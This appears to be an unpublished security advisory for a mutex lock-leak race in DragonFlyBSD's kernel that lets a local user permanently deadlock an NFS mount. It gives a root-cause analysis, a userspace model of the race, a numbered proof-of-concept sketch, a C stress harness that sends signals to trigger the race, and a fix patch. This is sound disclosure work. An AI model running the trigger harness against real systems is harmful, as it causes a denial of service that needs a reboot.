mtx_wait_link lock-leak race: chain can grant lock during mtx_delete_link window, caller returns error despite holding the lock (permanent deadlock)
| Field | Value |
|---|---|
| ID | DF-0047 |
| Status | new |
| Severity | Medium |
| CVSS 3.1 | CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H |
| CWE | CWE-362 Race Condition; CWE-667 Improper Locking |
| File | sys/kern/kern_mutex.c |
| Lines | 1002-1028 (mtx_wait_link), 925-941 (mtx_delete_link default) |
| Area | kern |
| Confidence | likely |
| Discovered | 2026-06-29 |
| Reported | pending |
Summary
When mtx_wait_link's tsleep() returns a non-zero error (EINTR from a
PCATCH signal, or EWOULDBLOCK from a timeout) and link->state is still
MTX_LINK_LINKED_* at the unlocked switch read (:1002), the code calls
mtx_delete_link (:1012). Between that read and mtx_delete_link's
acquisition of MTX_LINKSPIN, a concurrent mtx_chain_link_ex/sh (triggered
by another CPU's _mtx_unlock) can grant the lock to this exact link: it
removes the link, sets mtx->mtx_owner = link->owner,
link->state = MTX_LINK_ACQUIRED, and wakes. mtx_delete_link then sees
ACQUIRED and hits its default "no change" case (:935). But mtx_wait_link
never re-checks link->state after mtx_delete_link returns; it falls through
to the default (:1014-1016, preserving the non-zero error) and overwrites
state to IDLE (:1023), returning EINTR/EWOULDBLOCK even though the mutex
is now exclusively held by the caller's thread. The caller, seeing a non-zero
return, does not call mtx_unlock, so the lock is permanently leaked: every
subsequent acquisition deadlocks.
Root cause
sys/kern/kern_mutex.c:1002-1028:
switch(link->state) {			/* :1002 UNLOCKED read */
case MTX_LINK_ACQUIRED:
case MTX_LINK_CALLEDBACK:
	error = 0;
	break;
case MTX_LINK_ABORTED:
	error = ENOLCK;
	break;
case MTX_LINK_LINKED_EX:
case MTX_LINK_LINKED_SH:
	mtx_delete_link(mtx, link);	/* :1012 may race chain grant */
	/* fall through */
default:
	if (error == 0)			/* :1015 no re-check of state */
		error = EWOULDBLOCK;
	break;
}
link->state = MTX_LINK_IDLE;		/* :1023 clobbers ACQUIRED */
return error;				/* :1028 returns non-zero despite owning lock */
mtx_delete_link correctly handles seeing ACQUIRED (default "no change"
:935-937, since the chain already removed the link), but mtx_wait_link
does not re-check link->state afterward. tsleep can return EINTR
even when wakeup() has also been called (a pending signal sets error=EINTR).
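
The interleaving can be replayed deterministically in userspace. The following is a minimal sketch, not kernel code: every name (model_mtx, model_link, model_wait_link, the LINK_* states) is hypothetical and only mirrors the structure of the excerpt above. The race flag injects the chain grant between the unlocked state read and the delete call, and the recheck flag applies the re-check proposed under "Recommended fix".

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical userspace model; names mirror the report, not the kernel. */
enum link_state { LINK_IDLE, LINK_LINKED_EX, LINK_ACQUIRED };

struct model_mtx  { const void *owner; };	/* NULL means unowned */
struct model_link { enum link_state state; const void *owner; };

/* Models mtx_chain_link_ex(): the unlocking CPU hands the lock to this link. */
static void
model_chain_grant(struct model_mtx *mtx, struct model_link *link)
{
	mtx->owner = link->owner;
	link->state = LINK_ACQUIRED;
}

/* Models mtx_delete_link(): unlink if still linked, otherwise "no change". */
static void
model_delete_link(struct model_mtx *mtx, struct model_link *link)
{
	(void)mtx;
	if (link->state == LINK_LINKED_EX)
		link->state = LINK_IDLE;
}

/*
 * Models the tail of mtx_wait_link() after the sleep returned sleep_error.
 * race != 0 runs the chain grant inside the window described above;
 * recheck != 0 re-reads the state after the delete call.
 */
static int
model_wait_link(struct model_mtx *mtx, struct model_link *link,
    int sleep_error, int race, int recheck)
{
	int error = sleep_error;

	assert(mtx != NULL && link != NULL);
	switch (link->state) {		/* state is read once, here */
	case LINK_ACQUIRED:
		error = 0;
		break;
	case LINK_LINKED_EX:
		if (race)
			model_chain_grant(mtx, link);	/* other CPU wins */
		model_delete_link(mtx, link);
		if (recheck && link->state == LINK_ACQUIRED) {
			error = 0;	/* we own the lock: report success */
			break;
		}
		/* fall through */
	default:
		if (error == 0)
			error = EWOULDBLOCK;
		break;
	}
	link->state = LINK_IDLE;
	return error;
}
```

In this model, calling model_wait_link with sleep_error = EINTR, race = 1 and recheck = 0 returns EINTR while mtx->owner already equals link->owner, which is the leaked-lock state. The same call with recheck = 1 returns 0, so a caller following the usual "unlock only on success" convention would release the lock.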
Threat model & preconditions
- Attacker position: any local user on a code path that takes a mutex with
  PCATCH or a timeout. The primary in-tree caller is the NFS client socket
  lock (mtx_lock_ex_link with slpflag=PCATCH, slptimeo=2*hz at
  sys/vfs/nfs/nfs_socket.c:2184). A local user doing NFS I/O who receives a
  signal (Ctrl-C / SIGINT) at the moment the socket lock is being released by
  another thread can hit the race.
- Privileges gained or impact: permanent kernel deadlock (local DoS). The
  leaked lock deadlocks all subsequent operations on that NFS mount, requiring
  a reboot to clear. Not remote on its own (needs a local signal target); the
  NFS path is reachable from any local user with NFS access.
- Required config or capabilities: a contended mtx_lock_*_link caller with
  PCATCH/timeout (NFS); a local signal target.
- Reachability: contended mutex acquisition + signal/timeout racing the
  unlock/chain-grant on another CPU.
Proof of concept (sketch)
1. Local user mounts NFS and issues contended I/O (concurrent reads)
   contending on the NFS socket lock.
2. One thread blocks in mtx_wait_link inside nfs_rcvlock/nfs_sndlock (PCATCH).
3. Send SIGINT to the process. tsleep returns EINTR.
4. The lock holder releases; _mtx_unlock -> mtx_chain_link_ex grants the lock
   to the signaled thread during its mtx_delete_link window.
5. mtx_wait_link returns EINTR; the NFS code treats it as not-acquired and
   does not mtx_unlock.
6. The socket lock is now permanently held (MTX_EXCLUSIVE|1); all future NFS
   send/receive on that mount deadlocks.

Repeat 1-3 to raise hit probability.
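
The first three steps could be driven by a small stress harness along the following lines. This is an untested sketch under stated assumptions: stress_signal_reads, reader_loop, and MAX_READERS are hypothetical names, the file is assumed to live on an NFS mount whose sleeps are interruptible (the PCATCH precondition), and whether these reads actually reach nfs_rcvlock/nfs_sndlock depends on caching and mount options that the sketch does not control. It uses only POSIX calls (fork, pread, sigaction, kill, nanosleep, waitpid).

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define MAX_READERS 16		/* hypothetical cap on child readers */

/* No-op handler: its only purpose is to interrupt a blocked sleep. */
static void
on_sigint(int sig)
{
	(void)sig;
}

/* Child: re-read the same offset forever; EINTR is expected and ignored. */
static void
reader_loop(const char *path)
{
	char buf[4096];
	int fd = open(path, O_RDONLY);

	if (fd < 0)
		_exit(1);
	for (;;) {
		if (pread(fd, buf, sizeof(buf), 0) < 0 && errno != EINTR)
			_exit(2);
	}
}

/*
 * Fork nreaders children reading path, deliver SIGINT to each of them
 * rounds times (1 ms apart), then kill and reap them.
 * Returns 0 on completion, -1 on bad arguments or setup failure.
 */
static int
stress_signal_reads(const char *path, int nreaders, int rounds)
{
	struct timespec pause = { 0, 1000000L };
	struct sigaction sa, old;
	pid_t pids[MAX_READERS];
	int i, r, started = 0;

	assert(path != NULL);
	if (nreaders < 1 || nreaders > MAX_READERS)
		return -1;

	/* Install before fork() so children inherit it; no SA_RESTART. */
	memset(&sa, 0, sizeof(sa));
	sa.sa_handler = on_sigint;
	sigemptyset(&sa.sa_mask);
	if (sigaction(SIGINT, &sa, &old) != 0)
		return -1;

	for (i = 0; i < nreaders; i++) {
		pid_t pid = fork();

		if (pid < 0)
			break;
		if (pid == 0)
			reader_loop(path);	/* never returns */
		pids[started++] = pid;
	}
	for (r = 0; r < rounds; r++) {
		for (i = 0; i < started; i++)
			kill(pids[i], SIGINT);
		nanosleep(&pause, NULL);
	}
	for (i = 0; i < started; i++) {
		kill(pids[i], SIGKILL);
		waitpid(pids[i], NULL, 0);
	}
	sigaction(SIGINT, &old, NULL);
	return started == nreaders ? 0 : -1;
}
```

If the race were hit, the expectation (not verified here) is that readers would stop making progress and the final waitpid calls could block, since a process stuck on the leaked socket lock may not be killable. Run it only on a disposable test system.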
Impact
Permanent kernel deadlock (local DoS) via a lock-leak race on PCATCH/timeout
mutex acquisitions. Medium (AC:H = the race window; A:H = a full permanent
deadlock).
Recommended fix
Re-check link->state for ACQUIRED after mtx_delete_link returns in the
LINKED case, and return success so the caller unlocks:
--- a/sys/kern/kern_mutex.c
+++ b/sys/kern/kern_mutex.c
@@ -1010,6 +1010,18 @@
 	case MTX_LINK_LINKED_EX:
 	case MTX_LINK_LINKED_SH:
 		mtx_delete_link(mtx, link);
+		/*
+		 * mtx_chain_link_{ex,sh}() may have granted us the lock
+		 * (state -> ACQUIRED) while we were spinning on LINKSPIN
+		 * inside mtx_delete_link(). If so we now own the lock and
+		 * MUST return success so the caller unlocks it; otherwise
+		 * the lock is silently leaked, deadlocking all future
+		 * acquisitions.
+		 */
+		if (link->state == MTX_LINK_ACQUIRED) {
+			error = 0;
+			break;
+		}
 		/* fall through */
 	default:
 		if (error == 0)
References
- sys/kern/kern_mutex.c:1002-1028 (the un-rechecked post-mtx_delete_link path).
- sys/kern/kern_mutex.c:925-941 (mtx_delete_link default "no change" for ACQUIRED).
- sys/vfs/nfs/nfs_socket.c:2184 (reachable PCATCH caller).
- CWE-362 Race Condition; CWE-667 Improper Locking.
Timeline
- 2026-06-29: Discovered during automated file-by-file audit of
  sys/kern/kern_mutex.c.
- pending: Reported to DragonFlyBSD security contact.